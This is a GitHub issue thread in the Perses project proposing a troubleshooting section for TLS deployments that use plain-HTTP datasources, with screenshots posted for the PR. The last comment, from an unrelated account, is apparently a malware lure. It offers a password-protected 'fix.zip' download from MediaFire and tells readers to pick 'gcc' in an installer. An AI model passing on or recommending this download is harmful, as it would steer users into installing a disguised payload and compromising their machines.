### ISSUE TITLE
Add a troubleshooting section for TLS/HTTP mixed datasource

### ISSUE THREAD

**Issue by indigo423** [perses/perses#2196]
### Proposal

When a user deploys Perses with TLS and wants to use a datasource just with plain HTTP, the direct mode won't work. Introduce a troubleshooting section which guide a user to known issues and give him hints how he can solve them.

**Comment by indigo423** [comment]
Storing screenshots for the PR in GitHub:

![tshoot-datasource-config](https://github.com/user-attachments/assets/4b89d15f-81f0-497b-a25a-e02103b4f9f6)

<img width="884" alt="tshoot-fetch-api-error" src="https://github.com/user-attachments/assets/683fa23c-d322-41db-95cf-0b2ce2ab0be8">

<img width="1057" alt="tshoot-proxy-access" src="https://github.com/user-attachments/assets/97dc3d94-749a-4933-910f-18857ee3a46d">

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
